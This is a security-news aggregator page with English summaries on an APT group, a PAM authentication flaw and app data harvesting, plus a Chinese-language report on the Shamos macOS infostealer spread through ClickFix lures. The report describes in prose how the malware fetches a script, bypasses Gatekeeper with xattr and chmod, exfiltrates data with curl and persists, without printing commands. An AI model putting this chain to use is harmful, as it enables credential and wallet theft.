Aggregator

China-based threat actor Mustang Panda has emerged as one of the most sophisticated cyber espionage groups operating in the current threat landscape, with operations dating back to at least 2014. This advanced persistent threat (APT) group has systematically targeted government entities, nonprofit organizations, religious institutions, and NGOs across the United States, Europe, Mongolia, Myanmar, Pakistan, […]

The post China-based Threat Actor Mustang Panda’s Tactics, Techniques, and Procedures Unveiled appeared first on Cyber Security News.

Doppel has introduced a new product called Doppel Simulation, which expands its platform for defending against social engineering. The tool uses autonomous AI agents to create multi-channel simulations that mirror how attackers operate across email, SMS, messaging apps, and soon voice. The goal is to move beyond legacy phishing tests that rely on email click rates and instead measure resilience across a broader set of real-world attack paths. For CISOs, the launch represents a shift … More →

The post What CISOs can learn from Doppel’s new AI-driven social engineering simulation appeared first on Help Net Security.

Cybersecurity researchers have uncovered a critical security flaw in Securden Unified PAM that allows attackers to completely bypass authentication mechanisms and gain unauthorized access to sensitive credentials and system functions. The vulnerability, designated as CVE-2025-53118 with a CVSS score of 9.4, represents one of four serious security issues discovered in the privileged access management solution […]

The post Securden Unified PAM Vulnerability Let Attackers Bypass Authentication appeared first on Cyber Security News.

Both domestic and foreign technology companies collect vast amounts of Americans’ personal data through mobile applications, according to Incogni. Some apps leverage data for marketing and advertising purposes, feeding algorithms to calculate optimal prices based on consumer behavior, often leading to unwanted spending. Other apps share user data with unnamed third parties, increasing the risk of breaches with every additional recipient. Additionally, there is the threat of government appropriation of this data. Recently, foreign-owned apps … More →

The post Social media apps that aggressively harvest user data appeared first on Help Net Security.

一款名为“Shamos”的新型信息窃取恶意软件正针对Mac设备发起攻击，它借助“ClickFix攻击”（伪装成故障排除指南及修复方案）实施行动。

该恶意软件是“Atomic macOS Stealer（AMOS，原子 macOS 窃取者）”的变种，由网络犯罪团伙“COOKIE SPIDER”开发，用于窃取存储在网页浏览器、钥匙串项目、苹果备忘录以及加密货币钱包中的数据和凭证。

发现Shamos的CrowdStrike公司报告称，自2025年6月以来，该恶意软件已尝试对其监控的全球超300个环境发起感染。

借助ClickFix攻击进行传播

受害者会被恶意广告或伪造的GitHub仓库引诱——这些渠道利用ClickFix攻击，诱导用户在macOS终端中执行shell命令。

威胁者会催促用户运行这些命令以“安装软件”或“修复虚假错误”，但命令一旦执行，实际上会在设备上下载并运行恶意软件。

恶意GitHub存储库

相关广告或伪造页面（如mac-safer[.]com、rescue-mac[.]com）声称能解决用户可能搜索的macOS相关问题，其中包含让用户复制粘贴命令以“修复问题”的指示。

谷歌搜索上的恶意赞助结果

然而，这些命令并不会解决任何问题，反而会解码一个Base64编码的URL，并从远程服务器获取恶意的Bash脚本。

在macOS上修复打印机问题的错误说明

该脚本会获取用户密码，下载Shamos的mach-O可执行文件，还会利用“xattr”（移除隔离标记）和“chmod”（赋予二进制文件可执行权限）来绕过Gatekeeper，进而准备并执行恶意软件。

Shamos的数据窃取行为

Shamos在设备上执行后，会先运行反虚拟机命令，确认自身并非在沙箱中运行，随后通过AppleScript命令进行主机侦察和数据收集。

它会在设备上搜索敏感数据，包括加密货币钱包文件、钥匙串数据、苹果备忘录数据以及受害者浏览器中存储的信息。 

收集完所有数据后，它会将这些数据打包成名为“out.zip”的压缩包，再通过curl传输给攻击者。

若该恶意软件以sudo权限运行，还会创建一个Plist文件（com.finder.helper.plist），并将其存储在用户的LaunchDaemons目录中，通过系统启动时自动执行来确保持久化驻留。

CrowdStrike还指出，Shamos能够将额外的载荷下载到受害者的主目录中，且已观察到威胁者投放伪造的Ledger Live钱包应用程序和僵尸网络模块的情况。

给macOS用户的建议

建议macOS用户，若不完全清楚命令，切勿在自己的系统上执行。对于GitHub仓库也应如此。该平台上存在众多恶意项目，其目的就是感染毫无防备的用户。

当macOS出现问题时，应避免点击赞助搜索结果，而是到由苹果审核的苹果社区论坛，或通过系统内置的“帮助”功能（按下Cmd + Space，输入“Help”）寻求帮助。

ClickFix攻击已成为一种广泛用于传播恶意软件的策略，威胁者会在TikTok视频中使用该策略，或将其伪装成验证码，亦或是作为“修复”虚假Google Meet错误的方案。 

事实证明，这种策略在恶意软件部署方面极为有效，已被用于勒索软件攻击。